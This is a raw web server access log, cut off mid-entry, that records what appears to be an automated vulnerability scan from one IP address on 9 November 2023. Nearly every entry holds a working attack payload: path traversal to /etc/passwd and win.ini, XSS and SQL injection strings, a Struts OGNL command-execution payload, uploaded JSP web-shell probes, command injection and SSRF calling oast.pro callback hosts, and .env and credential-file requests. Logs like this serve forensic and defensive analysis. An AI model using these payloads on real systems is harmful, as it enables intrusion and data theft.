/resource/file:/etc/passwd/ - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 408 2023-11-09 17:50:18 103.153.214.94 POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 362 2023-11-09 17:51:28 103.153.214.94 POST /javax.faces.resource/dynamiccontent.properties.xhtml - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 366 2023-11-09 17:51:43 103.153.214.94 GET /theme/META-INF/˨˨/˨˨/˨˨/˨˨/˨˨/˨˨/˨˨/˨˨/˨˨/˨˨/etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 364 2023-11-09 17:51:46 103.153.214.94 GET /theme/META-INF/prototypeÀ¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 370 2023-11-09 17:52:22 103.153.214.94 GET /services/getFile.cmd userfile=config.xml 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 362 2023-11-09 17:53:17 103.153.214.94 GET /cs/idcplg IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 391 2023-11-09 17:53:21 103.153.214.94 GET /cs/idcplg IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)> 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 382 2023-11-09 17:53:32 103.153.214.94 GET /search/members/ id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 366 2023-11-09 17:53:41 103.153.214.94 GET /forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 360 2023-11-09 17:53:44 103.153.214.94 GET /boards/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 361 2023-11-09 17:53:47 103.153.214.94 GET /board/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 362 2023-11-09 17:53:50 103.153.214.94 GET /forum/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 364 2023-11-09 17:53:53 103.153.214.94 GET /forums/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 388 2023-11-09 17:53:55 103.153.214.94 POST /RPC2 - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 360 2023-11-09 17:53:57 103.153.214.94 GET /vb/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 363 2023-11-09 17:54:43 103.153.214.94 GET /index.php c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 362 2023-11-09 17:54:53 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 362 2023-11-09 17:54:56 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 364 2023-11-09 17:56:12 103.153.214.94 GET /fosagent/repl/download-file basedir=4&filepath=..\..\Windows\win.ini 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 366 2023-11-09 17:56:14 103.153.214.94 GET /fosagent/repl/download-snapshot name=..\..\..\..\..\..\..\Windows\win.ini 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 362 2023-11-09 17:56:26 103.153.214.94 GET /rest/v1/AccountService/Accounts - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 368 2023-11-09 17:57:27 103.153.214.94 GET /gsearch.php.en prod=';prompt`document.domain`;// 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 367 2023-11-09 17:57:27 103.153.214.94 GET /dokuwiki/doku.php id=wiki:welcome&at=<svg%20onload=alert(document.domain)> 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 360 2023-11-09 17:58:47 103.153.214.94 POST / name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 386 2023-11-09 17:59:05 103.153.214.94 GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS /.. 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 364 2023-11-09 17:59:10 103.153.214.94 PUT /_users/org.couchdb.user:poc - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 362 2023-11-09 17:59:17 103.153.214.94 GET /create_user/ username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 389 2023-11-09 17:59:33 103.153.214.94 POST /invoker/JMXInvokerServlet/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 361 2023-11-09 17:59:35 103.153.214.94 POST /invoker/EJBInvokerServlet/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 361 2023-11-09 17:59:37 103.153.214.94 GET /solr/admin/cores wt=json 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 376 2023-11-09 17:59:38 103.153.214.94 POST /invoker/readonly - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 1391 2023-11-09 18:00:26 103.153.214.94 GET /remote/loginredir redir=javascript:alert(document.domain) 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 379 2023-11-09 18:00:27 103.153.214.94 GET /xda/help/en/default.htm startat=//oast.me 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 391 2023-11-09 18:00:29 103.153.214.94 GET /webadmin/script command=|%20nslookup%20cl6fbhsfe7k9sg331pog4ss5pwb3m6c84.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 376 2023-11-09 18:01:06 103.153.214.94 PUT /2XwZKyivOk3WU3yWNJjlSp4V6WP.jsp/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 362 2023-11-09 18:01:09 103.153.214.94 GET /2XwZKyivOk3WU3yWNJjlSp4V6WP.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 360 2023-11-09 18:01:17 103.153.214.94 PUT /poc.jsp/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 364 2023-11-09 18:01:20 103.153.214.94 GET /poc.jsp cmd=cat+%2Fetc%2Fpasswd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 363 2023-11-09 18:01:38 103.153.214.94 GET /maint/modules/home/index.php lang=english|cat%20/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 383 2023-11-09 18:03:37 103.153.214.94 GET /carbon/resources/add_collection_ajaxprocessor.jsp collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 374 2023-11-09 18:05:19 103.153.214.94 POST /maint/index.php packages 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 bcvt.kontum.gov.vn/maint/index.php?packages 405 0 1 373 2023-11-09 18:05:19 103.153.214.94 GET /webadmin/pkg command=<script>alert(document.cookie)</script> 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 365 2023-11-09 18:05:22 103.153.214.94 GET /maint/modules/home/index.php lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 bcvt.kontum.gov.vn/maint/index.php?packages 200 0 0 366 2023-11-09 18:06:06 103.153.214.94 GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php file=../../../../../../../LocalConfiguration.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 1110 2023-11-09 18:06:48 103.153.214.94 GET /cgi-bin/webproc getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 363 2023-11-09 18:07:47 103.153.214.94 GET /esp/cms_changeDeviceContext.esp device=aaaaa:a%27";user|s."1337"; 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 367 2023-11-09 18:08:02 103.153.214.94 GET /.env - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 364 2023-11-09 18:08:10 103.153.214.94 GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 366 2023-11-09 18:08:21 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 368 2023-11-09 18:08:24 103.153.214.94 GET /2XwZKVe5bkRnRWJLuakdjvKGgch.php/x0A - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 362 2023-11-09 18:08:34 103.153.214.94 POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 367 2023-11-09 18:09:13 103.153.214.94 GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 395 2023-11-09 18:09:23 103.153.214.94 GET /CMSInstall/install.aspx - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 363 2023-11-09 18:09:58 103.153.214.94 GET /plus/recommend.php action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 361 2023-11-09 18:10:43 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 371 2023-11-09 18:10:43 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 368 2023-11-09 18:10:46 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 362 2023-11-09 18:20:16 103.153.214.94 GET / author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 368 2023-11-09 18:23:46 103.153.214.94 GET /wp-content/plugins/qards/html2canvasproxy.php url=https://cl6fbhsfe7k9sg331pogp4fwejpooc9e4.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 365 2023-11-09 18:24:13 103.153.214.94 GET /composer/send_email to=gesl@ygAs&url=http://cl6fbhsfe7k9sg331pogpj4mg6jehkotk.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 362 2023-11-09 18:25:06 103.153.214.94 GET /OA_HTML/cabo/jsps/a.jsp _t=fredRC&configName&redirect=%2f%5cinteract.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 369 2023-11-09 18:25:17 103.153.214.94 POST /wls-wsat/RegistrationRequesterPortType - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 362 2023-11-09 18:25:29 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:40.0)+Gecko/20100101+Firefox/40.1';alert(/XSS/);// - 200 0 0 367 2023-11-09 18:25:41 103.153.214.94 GET /login.php mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 387 2023-11-09 18:25:46 103.153.214.94 GET /passwordrecovered.cgi id=74iWn 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 360 2023-11-09 18:26:23 103.153.214.94 GET /image/image:/..%2fetc%2fpasswd - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 11 0 377 2023-11-09 18:26:28 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 366 2023-11-09 18:26:59 103.153.214.94 OPTIONS / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1022 2023-11-09 18:27:07 103.153.214.94 GET /magmi/web/ajax_gettime.php prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 361 2023-11-09 18:27:22 103.153.214.94 GET /system/deviceInfo auth=YWRtaW46MTEK 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 362 2023-11-09 18:27:31 103.153.214.94 GET /current_config/Sha1Account1 - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 369 2023-11-09 18:27:52 103.153.214.94 GET /current_config/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 365 2023-11-09 18:28:03 103.153.214.94 GET /Telerik.ReportViewer.axd optype=Parameters&bgColor=_000000%22onload=%22prompt(1) 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 360 2023-11-09 18:28:06 103.153.214.94 GET /wp-json/wp/v2/users/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 1099 2023-11-09 18:28:08 103.153.214.94 GET / rest_route=/wp/v2/users/ 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 365 2023-11-09 18:28:08 103.153.214.94 GET /index.php option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 366 2023-11-09 18:28:10 103.153.214.94 GET /wp-content/plugins/raygun4wp/sendtesterror.php backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 361 2023-11-09 18:28:50 103.153.214.94 POST /clients/editclient.php id=2XwZKQ8TnWzKOmKOYebtu5MZ01n&action=update 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 361 2023-11-09 18:28:54 103.153.214.94 GET /logos_clients/2XwZKQ8TnWzKOmKOYebtu5MZ01n.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 1100 2023-11-09 18:29:20 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 393 2023-11-09 18:29:22 103.153.214.94 GET /hw-sys.htm - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 366 2023-11-09 18:29:59 103.153.214.94 GET /plugins/servlet/oauth/users/icon-uri consumerUri=http://cl6fbhsfe7k9sg331pogcr6gpm9tq9qz1.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 369 2023-11-09 18:30:28 103.153.214.94 GET /base_import/static/c:/windows/win.ini - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 375 2023-11-09 18:30:30 103.153.214.94 GET /base_import/static/etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 373 2023-11-09 18:31:18 103.153.214.94 POST /integration/saveGangster.action - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 364 2023-11-09 18:33:23 103.153.214.94 GET /__ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 363 2023-11-09 18:33:58 103.153.214.94 GET /cgi-bin/wapopen 